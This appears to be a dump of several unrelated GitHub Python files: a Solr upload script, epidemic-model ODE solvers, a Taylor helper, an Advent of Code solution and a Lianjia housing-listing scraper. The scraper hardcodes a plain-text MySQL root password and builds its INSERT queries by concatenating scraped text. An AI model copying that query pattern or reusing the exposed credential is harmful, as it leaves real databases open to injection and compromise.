[Y/n]')\n if decide in ['y', '']:\n create = True\n print('deleting collection')\n \"\"\" {\n 'responseHeader': {'status': 0, 'QTime': 201}, \n 'success': {\n 'solr2:8983_solr': {'responseHeader': {'status': 0, 'QTime': 19}}, \n 'solr0:8983_solr': {'responseHeader': {'status': 0, 'QTime': 20}}, \n 'solr1:8983_solr': {'responseHeader': {'status': 0, 'QTime': 20}}\n }\n } \n\n error = {\n 'responseHeader': {'QTime': 20, 'status': 400},\n 'Operation delete caused exception:': 'org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Could not find collection : dblp',\n 'error': {\n 'code': 400,\n 'metadata': [\n 'error-class',\n 'org.apache.solr.common.SolrException',\n 'root-error-class',\n 'org.apache.solr.common.SolrException'\n ],\n 'msg': 'Could not find collection : dblp'\n },\n 'exception': {\n 'msg': 'Could not find collection : dblp',\n 'rspCode': 400\n },\n }\n \"\"\"\n pprint(s.admin.collections.delete(collection_name).json())\n else:\n create = True\n\n create_cfg = False\n pprint(s.admin.configs.list().json())\n configsets = s.admin.configs.list().json()['configSets']\n if config_online in configsets:\n decide = input(f'config {config_online} exists, replace? [Y/n]')\n if decide in ['y', '']:\n print('deleting config')\n # {'responseHeader': {'status': 0, 'QTime': 99}}\n print(s.admin.configs.delete(config_online).json())\n else:\n create_cfg = True\n if create_cfg:\n print('sending latest config')\n # {'responseHeader': {'status': 0, 'QTime': 148}}\n print(s.admin.configs.upload(config_online, get_config(config_local)).json())\n if create:\n print('creating collection')\n \"\"\" {\n 'responseHeader': {'status': 0, 'QTime': 1888}, \n 'success': { \n 'solr1:8983_solr': {'responseHeader': {'status': 0, 'QTime': 1299}, 'core': 's2_shard3_replica_n4'}, \n 'solr2:8983_solr': {'responseHeader': {'status': 0, 'QTime': 1300}, 'core': 's2_shard2_replica_n2'}, \n 'solr0:8983_solr': {'responseHeader': {'status': 0, 'QTime': 1303}, 'core': 's2_shard1_replica_n1'}\n }\n } \"\"\"\n \"\"\"{\n 'responseHeader': {'status': 0, 'QTime': 1804}, \n 'failure': {\n 'solr2:8983_solr': \"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:Error from server at http://solr2:8983/solr: Error CREATEing SolrCore 'dblp_shard2_replica_n2': Unable to create core [dblp_shard2_replica_n2] Caused by: Unknown fieldType 'text_ngram' specified on field suggest_ngram\", \n 'solr1:8983_solr': \"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:Error from server at http://solr1:8983/solr: Error CREATEing SolrCore 'dblp_shard1_replica_n1': Unable to create core [dblp_shard1_replica_n1] Caused by: Unknown fieldType 'text_ngram' specified on field suggest_ngram\", \n 'solr0:8983_solr': \"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:Error from server at http://solr0:8983/solr: Error CREATEing SolrCore 'dblp_shard3_replica_n4': Unable to create core [dblp_shard3_replica_n4] Caused by: Unknown fieldType 'text_ngram' specified on field suggest_ngram\"\n }\n }\n \"\"\"\n create_params = COLLECTION_DEFAULTS.copy()\n create_params.update({\n 'name': collection_name,\n 'config_name': config_online,\n })\n pprint(s.admin.collections.create(**create_params).json())\n\n print('sending documents')\n c = s.collection(collection_name)\n maybe_add_field(c, 'doi', 'important_string')\n maybe_add_field(c, 'note', 'important_strings')\n maybe_add_field(c, 'author_count', 'pint')\n\n counter = 0\n batch_size = 10_000\n # batch_generator = 
batch_jsonl_parsed(build_upload_document(generate_events()), batch_size, parse_json)\n    batch_generator = batch_jsonl_parsed(yield_from_gzip(), batch_size, parse_json)\n    for response in upload_parallel(batch_generator, c):  # 3922 batches with 10_000 size\n        counter += 1\n        # {'responseHeader': {'rf': 1, 'status': 0, 'QTime': 2499}}\n        d = response.json()\n        if d['responseHeader']['status'] != 0:\n            print(f'{d}')\n        # print(f'{counter:4d}', end=' ')\n        # if counter % 10 == 0:\n        #     print()\n\n    # r = s.collection(collection).update.jsonl(yield_from_gzip())\n    # print(r.text)\n\n    # print('sending commit')\n    # r = s.collection(collection_name).update.xml('')\n    # print(r.text)\n    print('setting alias')\n    pprint(s.admin.collections.createalias(alias, [collection_name]).json())\n\n\nif __name__ == '__main__':\n    start = datetime.now()\n    main()\n    end = datetime.now()\n    print(f'took {end - start}')\n","repo_name":"sonne-academic/solr-utils","sub_path":"data/dblp/upload_dblp.py","file_name":"upload_dblp.py","file_ext":"py","file_size_in_byte":9062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34672503340","text":"import numpy as np\nimport scipy.integrate as inte\n\ndef fun_s(pLambda, pBeta, pDelta, pMiu):\n    return lambda s, e, i, l: pLambda - pBeta * s * (i + pDelta * l) - pMiu * s\n\n\ndef fun_e(pBeta, pP, pDelta, pR2, pMiu, pK, pR1):\n    return lambda s, e, i, l: pBeta * (1 - pP) * s * (i + (pDelta * l)) + pR2 * i - (pMiu + pK * (1 - pR1)) * e\n\n\ndef fun_i(pBeta, pP, pDelta, pK, pR1, pGamma, pMiu, pD1, pFi, pR2):\n    return lambda s, e, i, l: pBeta * pP * s * (i + pDelta * l) + pK * (1 - pR1) * e + pGamma * l - (pMiu + pD1 + pFi * (1 - pR2) + pR2) * i\n\n\ndef fun_l(pFi, pR2, pMiu, pD2, pGamma):\n    return lambda s, e, i, l: pFi * (1 - pR2)*i - (pMiu + pD2+ pGamma)*l\n\n\ndef get_functions(var_bools, tipo, To, Tf, pLambda, pBeta, pDelta, pP, pMiu, pK, pR1, pR2, pFi, pGamma, pD1, pD2, t, h):\n    funs = {\"S\": fun_s(pLambda, pBeta, pDelta, pMiu),\n            \"E\": fun_e(pBeta, pP, pDelta, pR2, pMiu, pK, pR1),\n            \"I\": fun_i(pBeta, pP, pDelta, pK, pR1, pGamma, pMiu, pD1, pFi, pR2),\n            \"L\": fun_l(pFi, pR2, pMiu, pD2, pGamma)}\n\n    ans = solve_function(tipo, funs, t, h, To, Tf)\n\n    for key in var_bools:\n        if var_bools[key] == 0:\n            del funs[key]\n\n    return ans\n\ndef solve_function(tipo, funs, t, h, To, Tf):\n    initial = {\n        \"S\": 0,\n        \"E\": 0,\n        \"I\": 0,\n        \"L\": 0\n    }\n    if tipo == \"Euler adelante\":\n        return sol_kutta2(funs, initial, t, h)\n    if tipo == \"Euler atrás\":\n        return sol_kutta2(funs, initial, t, h)\n    if tipo == \"Euler modificado\":\n        return sol_kutta2(funs, initial, t, h)\n    if tipo == \"Runge–Kutta 2\":\n        return sol_kutta2(funs, initial, t, h)\n    if tipo == \"Runge–Kutta 4\":\n        return sol_kutta4(funs, initial, t, h)\n    if tipo == \"solve_ivp\":\n        return solve_ip(funs, initial, t, To, Tf)\n\n\ndef sol_kutta2(funs, initial, t, h):\n    RK2 = {\n        \"S\": np.zeros(len(t)),\n        \"E\": np.zeros(len(t)),\n        \"I\": np.zeros(len(t)),\n        \"L\": np.zeros(len(t))\n    }\n\n    for key in RK2:\n        RK2[key][0] = initial[key]\n\n    k_val1 = {}\n    k_val2 = {}\n    for i in range(1, len(t)):\n        for key in RK2:\n            k_val1[key] = funs[key](RK2[\"S\"][i-1],\n                                    RK2[\"E\"][i-1],\n                                    RK2[\"I\"][i-1],\n                                    RK2[\"L\"][i-1])\n\n        for key in RK2:\n            k_val2[key] = funs[key](RK2[\"S\"][i-1] + k_val1[\"S\"]*h,\n                                    RK2[\"E\"][i-1] + k_val1[\"E\"]*h,\n                                    RK2[\"I\"][i-1] + k_val1[\"I\"]*h,\n                                    RK2[\"L\"][i-1] + k_val1[\"L\"]*h)\n\n        for key in RK2:\n            RK2[key][i] = RK2[key][i - 1] + (h / 2) * (k_val1[key] + 
k_val2[key])\n\n return RK2\n\ndef sol_kutta4(funs, initial, t, h):\n RK4 = {\n \"S\": np.zeros(len(t)),\n \"E\": np.zeros(len(t)),\n \"I\": np.zeros(len(t)),\n \"L\": np.zeros(len(t))\n }\n\n for key in RK4:\n RK4[key][0] = initial[key]\n\n k_val1 = {}\n k_val2 = {}\n k_val3 = {}\n k_val4 = {}\n for i in range(1, len(t)):\n for key in RK4:\n k_val1[key] = funs[key](RK4[\"S\"][i-1],\n RK4[\"E\"][i-1],\n RK4[\"I\"][i-1],\n RK4[\"L\"][i-1])\n\n for key in RK4:\n k_val2[key] = funs[key](RK4[\"S\"][i-1] + 0.5 * k_val1[\"S\"] * h,\n RK4[\"E\"][i-1] + 0.5 * k_val1[\"E\"] * h,\n RK4[\"I\"][i-1] + 0.5 * k_val1[\"I\"] * h,\n RK4[\"L\"][i-1] + 0.5 * k_val1[\"L\"] * h)\n\n for key in RK4:\n k_val3[key] = funs[key](RK4[\"S\"][i - 1] + 0.5 * k_val2[\"S\"] * h,\n RK4[\"E\"][i - 1] + 0.5 * k_val2[\"E\"] * h,\n RK4[\"I\"][i - 1] + 0.5 * k_val2[\"I\"] * h,\n RK4[\"L\"][i - 1] + 0.5 * k_val2[\"L\"] * h)\n\n for key in RK4:\n k_val4[key] = funs[key](RK4[\"S\"][i-1] + k_val3[\"S\"] * h,\n RK4[\"E\"][i-1] + k_val3[\"E\"] * h,\n RK4[\"I\"][i-1] + k_val3[\"I\"] * h,\n RK4[\"L\"][i-1] + k_val3[\"L\"] * h)\n\n for key in RK4:\n # weighted RK4 combination; every slope, including k_val4, is indexed per variable\n RK4[key][i] = RK4[key][i - 1] + (h / 6) * (k_val1[key] + 2 * k_val2[key] + 2 * k_val3[key] + k_val4[key])\n\n return RK4\n\ndef solve_ip(funs, initial, t, h, To, Tf):\n # h is unused but kept so the signature matches the call in solve_function;\n # each right-hand-side lambda is evaluated at the current state y = (S, E, I, L)\n FSystem = lambda t, y: [funs[\"S\"](y[0], y[1], y[2], y[3]), funs[\"E\"](y[0], y[1], y[2], y[3]), funs[\"I\"](y[0], y[1], y[2], y[3]), funs[\"L\"](y[0], y[1], y[2], y[3])]\n return inte.solve_ivp(FSystem, [To, Tf], [initial[\"S\"], initial[\"E\"], initial[\"I\"], initial[\"L\"]],t_eval=t, method='RK45')","repo_name":"NicolasAbo17/ProgCientifica","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"32691937218","text":"from core.variable import Equation\nfrom math import factorial\n\n\ndef taylor1D(equation, variable, point=0, steps=4):\n if isinstance(equation, Equation):\n polynomials = []\n for n in range(steps):\n if isinstance(variable, str):\n variable = equation.variables[variable]\n variable.value = point\n solution = equation.solve()\n polynomial = (solution / factorial(n)) * (variable - point)**n\n polynomials.append(polynomial)\n equation = equation.differentiate(variable.name)\n return sum(polynomials) if polynomials else 0\n\n\n","repo_name":"bstudiosoriginal/PhysicalSystemModeling","sub_path":"core/approximations/taylor.py","file_name":"taylor.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"16291136336","text":"#!/usr/bin/env python3\n#pylint: disable=invalid-name, too-few-public-methods\n\nimport sys\nfrom enum import Enum, auto\n\n################################################################################\n# Classes\n################################################################################\nclass Square(Enum):\n OPEN_GROUND = auto()\n TREES = auto()\n LUMBERYARD = auto()\n\n def tick(self, row, col, grid):\n surrounding_squares = get_surrounding_squares(row, col, grid)\n if self.is_open_ground():\n num_wooded = count(surrounding_squares, Square.is_trees)\n return Square.TREES if num_wooded >= 3 else self\n if self.is_trees():\n num_lumberyards = count(surrounding_squares, Square.is_lumberyard)\n return Square.LUMBERYARD if num_lumberyards >= 3 else self\n if self.is_lumberyard():\n num_wooded = count(surrounding_squares, Square.is_trees)\n num_lumberyards = count(surrounding_squares, Square.is_lumberyard)\n return self if num_lumberyards >= 1 and 
num_wooded >= 1 else \\\n Square.OPEN_GROUND\n raise Exception('Invalid square type', self)\n\n def to_char(self):\n return \\\n '.' if self == Square.OPEN_GROUND else \\\n '|' if self == Square.TREES else \\\n '#'\n\n def is_open_ground(self):\n return self == Square.OPEN_GROUND\n\n def is_trees(self):\n return self == Square.TREES\n\n def is_lumberyard(self):\n return self == Square.LUMBERYARD\n\n @staticmethod\n def from_char(char):\n square = \\\n Square.OPEN_GROUND if char == '.' else \\\n Square.TREES if char == '|' else \\\n Square.LUMBERYARD if char == '#' else \\\n None\n if not square:\n raise Exception('Invalid square char', char)\n return square\n\ndef get_surrounding_squares(row, col, grid):\n num_rows, num_cols = len(grid), len(grid[0])\n indices = get_surrounding_indices(row, col, num_rows, num_cols)\n return [grid[i][j] for i, j in indices]\n\ndef get_surrounding_indices(row, col, num_rows, num_cols):\n min_row, max_row = max(0, row - 1), min(num_rows - 1, row + 1)\n min_col, max_col = max(0, col - 1), min(num_cols - 1, col + 1)\n return [(i, j)\n for j in range(min_col, max_col + 1)\n for i in range(min_row, max_row + 1)\n # don't include yourself\n if (i, j) != (row, col)]\n\n################################################################################\n# Solve\n################################################################################\nNUM_MINUTES = 1000000000\ndef solve(grid):\n board_to_index = {}\n index_to_board = {}\n for i in range(NUM_MINUTES):\n # if i % 10 == 0:\n # print('{} ({:.2f}%)'.format(i, i / NUM_MINUTES))\n serialized_grid = serialize_grid(grid)\n answer = find_answer(board_to_index, index_to_board, serialized_grid, i)\n if answer is not None:\n return answer\n index_to_board[i] = serialize_grid(grid), calculate_resource_value(grid)\n board_to_index[serialized_grid] = i\n grid = next_grid(grid)\n return calculate_resource_value(grid)\n\ndef find_answer(board_to_index, index_to_board, serialized_grid, index):\n if serialized_grid not in board_to_index:\n return None\n start, end = board_to_index[serialized_grid], index\n length = end - start\n answer_cycle_index = (NUM_MINUTES - start) % length\n answer_absolute_index = start + answer_cycle_index\n _, resource_value = index_to_board[answer_absolute_index]\n return resource_value\n\nSERIALIZED_SQUARE_LENGTH = 2\nSLICE_SIZE = 8\nSQUARES_PER_SLICE = SLICE_SIZE // SERIALIZED_SQUARE_LENGTH\ndef serialize_grid(grid):\n return bytes(serialize_square_slice(square_slice) for square_slice in\n slices_of(flatten_gen(grid), SQUARES_PER_SLICE))\n\ndef serialize_square_slice(square_slice):\n num = 0\n for i, square in enumerate(square_slice):\n num += serialize_square(square) << (2*i)\n return num\n\ndef serialize_square(square):\n if square.is_open_ground():\n return 0\n if square.is_lumberyard():\n return 1\n return 2\n\ndef slices_of(enumerable, length):\n cur = []\n for value in enumerable:\n cur.append(value)\n if len(cur) == length:\n yield cur\n cur = []\n if cur:\n yield cur\n\ndef flatten_gen(grid):\n for row in grid:\n for square in row:\n yield square\n\ndef next_grid(grid):\n return [[square.tick(i, j, grid) for j, square in enumerate(row)]\n for i, row in enumerate(grid)]\n\ndef calculate_resource_value(grid):\n num_wooded = count2d(grid, Square.is_trees)\n num_lumberyards = count2d(grid, Square.is_lumberyard)\n return num_wooded * num_lumberyards\n\ndef count2d(grid, fun):\n return sum(count(row, fun) for row in grid)\n\ndef count(enumerable, fun):\n return sum(1 for value in enumerable if 
fun(value))\n\ndef create_grid_string(grid):\n return '\\n'.join(''.join(square.to_char() for square in row)\n for row in grid)\n\n################################################################################\n# Input\n################################################################################\ndef get_input():\n return [parse_line(line.strip()) for line in sys.stdin.readlines()]\n\ndef parse_line(line):\n return [Square.from_char(char) for char in line]\n\n################################################################################\n# Run\n################################################################################\ndef main():\n grid = get_input()\n print(solve(grid))\n\nif __name__ == '__main__':\n main()\n","repo_name":"HarrisonMc555/adventofcode","sub_path":"2018/day18b.py","file_name":"day18b.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1551555543","text":"import bs4\r\nimport urllib.request\r\nimport urllib.parse\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport time\r\nimport pymysql\r\n\r\n\r\n\r\n\r\nclass second_hand_house(object):\r\n url = 'https://nj.lianjia.com/ershoufang/pg'\r\n data_sum=0\r\n\r\n def __init__(self,start_page,end_page):\r\n self.start_page = start_page\r\n self.end_page = end_page\r\n def database_connectionAnd_create(self):\r\n mysql_host = 'the_second_house'\r\n mysql_name = 'localhost'\r\n mysql_user = 'root'\r\n mysql_port = 3306\r\n mysql_password = '1025058706zfr'\r\n dbconn = pymysql.connect(mysql_name, mysql_user, mysql_password, mysql_host, charset='utf8')\r\n cursor = dbconn.cursor()\r\n #cursor.execute('create table student(id int PRIMARY KEY NOT NULL,coummunity_name varchar(50),location varchar(50),total_price float(5,2),unit_price float(5,2),house_type varchar(50),floor varchar(20))')\r\n cursor.execute('create table inf(id int PRIMARY KEY NOT NULL,coummunity_name varchar(50),location varchar(50),total_price float(5,2),unit_price float(5,2),house_type varchar(50),floor varchar(20),construction_area varchar(20),house_structure varchar(50),inner_area varchar(20),building_type varchar(20),house_orientation varchar(20),building_structure varchar(20),renovation varchar(20),ladder_ratio varchar(20),elevator varchar(20),year_of_property_rights varchar(20))')\r\n def database_connectionAnd_insert(self,id_,community_name,location,total_price,unit_price,house_type,floor,construction_area,house_structure,inner_area,building_type,house_orientation,building_structure,renovation,ladder_ratio,elevator,year_of_property_rights):\r\n\r\n mysql_host = 'the_second_house'\r\n mysql_name = 'localhost'\r\n mysql_user = 'root'\r\n mysql_port = 3306\r\n mysql_password = '1025058706zfr'\r\n dbconn = pymysql.connect(mysql_name, mysql_user, mysql_password, mysql_host, charset='utf8')\r\n cursor = dbconn.cursor()\r\n cursor.execute('insert into inf values('+id_+',\"'+community_name+'\",\"'+location+'\",\"'+total_price+'\",\"'+unit_price+'\",\"'+house_type+'\",\"'+floor+'\",\"'+construction_area+'\",\"'+house_structure+'\",\"'+inner_area+'\",\"'+building_type+'\",\"'+house_orientation+'\",\"'+building_structure+'\",\"'+renovation+'\",\"'+ladder_ratio+'\",\"'+elevator+'\",\"'+year_of_property_rights+'\")')\r\n cursor.close()\r\n dbconn.commit()\r\n dbconn.close()\r\n def database_insert(self):pass\r\n\r\n\r\n def parse_content_detail(self,content):\r\n '''\r\n with open('contain.html','wb') as fp:\r\n fp.write(content)\r\n\r\n '''\r\n\r\n 
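 # --- editor's sketch (illustrative, not from the original repo): the blocks
 # below extract label/value pairs from the page's <li> items by running
 # hand-written regexes over str(li). The BeautifulSoup object already built in
 # this method can do the same more robustly; a minimal helper, assuming the
 # same <li><span class='label'>...</span>value</li> page structure, might be:
 #
 # def extract_label_pairs(container):
 #     pairs = {}
 #     for li in container.find_all('li'):
 #         label = li.find('span', class_='label')
 #         if label is None:
 #             continue
 #         key = label.get_text(strip=True)
 #         # the value is whatever text follows the label inside the <li>
 #         pairs[key] = li.get_text(strip=True)[len(key):].strip()
 #     return pairs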
global sum\r\n the_whole_information = {\r\n '小区名称': '',\r\n '小区地点': '',\r\n '总价': '',\r\n '单价': '',\r\n '房屋户型': '',\r\n '所在楼层': '',\r\n '建筑面积': '',\r\n '户型结构': '',\r\n '套内面积': '',\r\n '建筑类型': '',\r\n '房屋朝向': '',\r\n '建筑结构': '',\r\n '装修情况': '',\r\n '梯户比例': '',\r\n '配备电梯': '',\r\n '产权年限': '',\r\n #'户型区间信息': {'客厅': '', '卧室A': '', '卧室B': '', '卧室C': '', '厨房': '', '卫生间': '', '阳台': '', }\r\n\r\n }\r\n soup = BeautifulSoup(content,\"lxml\")\r\n #print(type(soup))\r\n\r\n\r\n\r\n #小区名称\r\n\r\n\r\n div_community_name = soup.find('div',class_='communityName')\r\n realname = div_community_name.find('a',class_='info')\r\n community_name =realname.string\r\n #print(community_name)\r\n the_whole_information['小区名称']=community_name\r\n\r\n\r\n div_area = soup.find('div',class_=\"aroundInfo\")\r\n\r\n\r\n\r\n #小区地点\r\n\r\n\r\n #print(div_area)\r\n area = div_area.find('span',class_='info')\r\n area_information=area.text\r\n #print(area.text)\r\n #print(area)\r\n s=\"\".join(area.text.split())\r\n #print(s)\r\n\r\n the_whole_information['小区地点']=s\r\n\r\n\r\n '''\r\n area_detail = area.find_all('a',target='_blank')\r\n \r\n area_information = ''\r\n for label in range(0,len(area_detail)):\r\n area_information=area_information+' '+area_detail[label].string\r\n print(area_information)\r\n \r\n '''\r\n\r\n\r\n\r\n #房价\r\n\r\n div_price = soup.find('div',class_='price')\r\n #print(div_price)\r\n span_total_price = div_price.find('span',class_='total')\r\n total_price = span_total_price.string+'万人民币'\r\n #print(total_price)\r\n span_unit_value =soup.find('span',class_='unitPriceValue')\r\n unit_price = span_unit_value.text\r\n #print(unit_price)\r\n\r\n the_whole_information['总价']=total_price\r\n the_whole_information['单价']=unit_price\r\n\r\n\r\n\r\n #房子信息\r\n\r\n div_house_content= soup.find('div',class_='base')\r\n house_info_dir={\r\n }\r\n for i in div_house_content.find_all('li'):\r\n #print(i)\r\n string=str(i)\r\n pattern = re.compile(r'
<li><span class=\"label\">(.*?)</span>.*?</li>
', re.S)\r\n result_type = pattern.findall(string)\r\n pattern = re.compile(r'
<li><span class=\"label\">.*?</span>(.*?)</li>
', re.S)\r\n result_content = pattern.findall(string)\r\n di={\r\n result_type[0]:result_content[0]\r\n }\r\n house_info_dir.update(di)\r\n #print(type(result_content[0]))\r\n #print(house_info_dir)\r\n\r\n #div_intro = soup.find('div',class_='introContent showbasemore')\r\n #print(div_intro)\r\n # the_whole_information['']\r\n #if '' in house_info_dir:\r\n #else: the_whole_information['']='暂无数据'\r\n\r\n\r\n if '房屋户型' in house_info_dir:the_whole_information['房屋户型'] = house_info_dir['房屋户型']\r\n else: the_whole_information['房屋户型']='暂无数据'\r\n\r\n if '所在楼层' in house_info_dir:the_whole_information['所在楼层'] = house_info_dir['所在楼层']\r\n else: the_whole_information['所在楼层']='暂无数据'\r\n\r\n if '建筑面积' in house_info_dir:the_whole_information['建筑面积'] = house_info_dir['建筑面积']\r\n else: the_whole_information['建筑面积']='暂无数据'\r\n\r\n\r\n if '户型结构' in house_info_dir:the_whole_information['户型结构'] = house_info_dir['户型结构']\r\n else :the_whole_information['户型结构']='暂无数据'\r\n\r\n if '套内面积' in house_info_dir:the_whole_information['套内面积'] = house_info_dir['套内面积']\r\n else: the_whole_information['套内面积'] = '暂无数据'\r\n\r\n if '建筑类型' in house_info_dir:the_whole_information['建筑类型'] = house_info_dir['建筑类型']\r\n else: the_whole_information['建筑类型']='暂无数据'\r\n\r\n if '房屋朝向' in house_info_dir:the_whole_information['房屋朝向'] = house_info_dir['房屋朝向']\r\n else: the_whole_information['房屋朝向']='暂无数据'\r\n\r\n if '建筑结构' in house_info_dir:the_whole_information['建筑结构'] = house_info_dir['建筑结构']\r\n else: the_whole_information['建筑结构']='暂无数据'\r\n\r\n if '装修情况' in house_info_dir:the_whole_information['装修情况'] = house_info_dir['装修情况']\r\n else: the_whole_information['装修情况'] = '暂无数据'\r\n\r\n if '梯户比例' in house_info_dir:the_whole_information['梯户比例'] = house_info_dir['梯户比例']\r\n else: the_whole_information['梯户比例']='暂无数据'\r\n\r\n if '配备电梯' in house_info_dir:the_whole_information['配备电梯'] = house_info_dir['配备电梯']\r\n else: the_whole_information['配备电梯']='暂无数据'\r\n\r\n if '产权年限' in house_info_dir:the_whole_information['产权年限'] = house_info_dir['产权年限']\r\n else: the_whole_information['产权年限']='暂无数据'\r\n\r\n house_intro_dir = {\r\n\r\n\r\n }\r\n\r\n\r\n div_base = soup.find_all('div',class_='baseattribute clear')\r\n '''\r\n for i in div_base:\r\n string = str(i)\r\n #print(i)\r\n pattern = re.compile(r'
<div class=\"name\">(.*?)</div>
    ',re.S)\r\n result_type = pattern.findall(string)\r\n print(result_type[0])\r\n pattern = re.compile(r'
<div class=\"content\">(.*?)</div>
    ',re.S)\r\n result_content = pattern.findall(string)\r\n re_left = result_content[0].lstrip()\r\n re_right = re_left.rstrip()\r\n\r\n\r\n house_in_dir={\r\n result_type[0]:re_right\r\n\r\n }\r\n house_intro_dir.update(house_in_dir)\r\n #print(house_intro_dir[result_type[0]])\r\n\r\n '''\r\n #print(the_whole_information['小区名称'])\r\n #print(house_info_dir['户型结构'])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n #户型分间\r\n '''\r\n div_des = soup.find('div',class_='des')\r\n if len(div_des):\r\n div_apartment = div_des.find_all('div',class_='list')\r\n #print(div_apartment[0])\r\n #print(div_apartment)\r\n div_list = div_apartment[0].find_all('div',class_='row')\r\n dir_row = {\r\n\r\n\r\n }\r\n #print(div_list)\r\n\r\n room_list = []\r\n for i in div_list:\r\n div_row = i.find_all('div',class_='col')\r\n #print(div_row)\r\n\r\n room_list_1 = []\r\n #这里有问题!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n for j in div_row:\r\n\r\n string = str(j)\r\n pattern =re.compile(r'
<div class=\"col\">(.*?)</div>
    ',re.S)\r\n re_row = pattern.findall(string)\r\n #print(re_row[0])\r\n room_list_1.append(re_row[0])\r\n room_list.append(room_list_1)\r\n for i in div_list:\r\n div_row = i.find_all('div',class_='col')\r\n #print(div_row)\r\n\r\n room_list_1 = []\r\n #这里有问题!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n for j in div_row:\r\n\r\n string = str(j)\r\n pattern =re.compile(r'
<div class=\"col\">(.*?)</div>
    ',re.S)\r\n re_row = pattern.findall(string)\r\n #print(re_row[0])\r\n room_list_1.append(re_row[0])\r\n room_list.append(room_list_1)\r\n #print(room_list)\r\n #输入信息\r\n '''\r\n '''the_whole_information['户型区间信息']['客厅']='面积:'+room_list[0][1]+' 方向 :'+room_list[0][2]+'窗户:'+room_list[0][3]\r\n the_whole_information['户型区间信息']['卧室A'] = '面积:' + room_list[1][1] + ' 方向 :' + room_list[1][2] + '窗户:' + room_list[1][3]\r\n the_whole_information['户型区间信息']['卧室B'] = '面积:' + room_list[2][1] + ' 方向 :' + room_list[2][2] + '窗户:' + room_list[2][3]\r\n the_whole_information['户型区间信息']['卧室C'] = '面积:' + room_list[3][1] + ' 方向 :' + room_list[3][2] + '窗户:' + room_list[3][3]\r\n the_whole_information['户型区间信息']['厨房'] = '面积:' + room_list[4][1] + ' 方向 :' + room_list[4][2] + '窗户:' + room_list[4][3]\r\n the_whole_information['户型区间信息']['卫生间'] = '面积:' + room_list[5][1] + ' 方向 :' + room_list[5][2] + '窗户:' + room_list[5][3]\r\n the_whole_information['户型区间信息']['阳台'] = '面积:' + room_list[6][1] + ' 方向 :' + room_list[6][2] + '窗户:' + room_list[6][3]\r\n \r\n '''\r\n\r\n\r\n '''\r\n #---------------------------------------------------------将roomlist内容装入the_whole_information里--------------------------------------------------------------------------\r\n\r\n\r\n\r\n\r\n\r\n\r\n else:\r\n room_list=['无户型分间信息']\r\n the_whole_information['户间区间信息']=room_list[0]\r\n #print(room_list[0])\r\n '''\r\n\r\n\r\n\r\n #print(type(the_whole_information))\r\n print(\"正在爬取\"+the_whole_information[\"小区名称\"]+\"的信息\")\r\n #print(type(str(the_whole_information['小区名称'])))\r\n self.database_connectionAnd_insert(str(self.data_sum),str(the_whole_information['小区名称']),str(the_whole_information['小区地点']),str(the_whole_information['总价']),str(the_whole_information['单价']),str(the_whole_information['房屋户型']),str(the_whole_information['所在楼层']),str(the_whole_information['建筑面积']),str(the_whole_information['户型结构']),str(the_whole_information['套内面积']),str(the_whole_information['建筑类型']),str(the_whole_information['房屋朝向']),str(the_whole_information['建筑结构']),str(the_whole_information['装修情况']),str(the_whole_information['梯户比例']),str(the_whole_information['配备电梯']),str(the_whole_information['产权年限']))\r\n self.data_sum+=1\r\n #print(the_whole_information['小区名称'])\r\n #print(house_info_dir['户型结构'])\r\n\r\n\r\n\r\n\r\n #exit()\r\n\r\n\r\n\r\n\r\n\r\n #交易属性\r\n\r\n '''\r\n \r\n div_house_trade = soup.find('div',class_='transaction')\r\n house_trade_dir={\r\n\r\n\r\n\r\n }\r\n div_house_trade_deep = div_house_trade.find('div',class_='content')\r\n\r\n for i in div_house_trade_deep.find_all('li'):\r\n print(i)\r\n string = str(i)\r\n pattern = re.compile(r'(.*?)',re.S)\r\n result_attribute = pattern.findall(string)\r\n print(result_attribute[0])\r\n pattern = re.compile(r'(.*?)', re.S)\r\n result_attribute_value = pattern.findall(string)\r\n print(result_attribute_value[0])\r\n \r\n tr_dir = {\r\n result_attribute[0]:result_attribute_value[0]\r\n\r\n }\r\n house_trade_dir.update(tr_dir)\r\n print(house_trade_dir)\r\n \r\n '''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n '''\r\n result= div_house_content.find_all('li')[0]\r\n\r\n #result = div_house_content.find_all(text=re.compile(r'.*?(.*?)',re.S))\r\n\r\n #print(str(result))\r\n pattern1 = re.compile(r'
<li><span class=\"label\">(.*?)</span>.*?</li>
',re.S)\r\n result_type = pattern1.findall(str(result))\r\n print(result_type[0])\r\n pattern = re.compile(r'
<li><span class=\"label\">.*?</span>(.*?)</li>
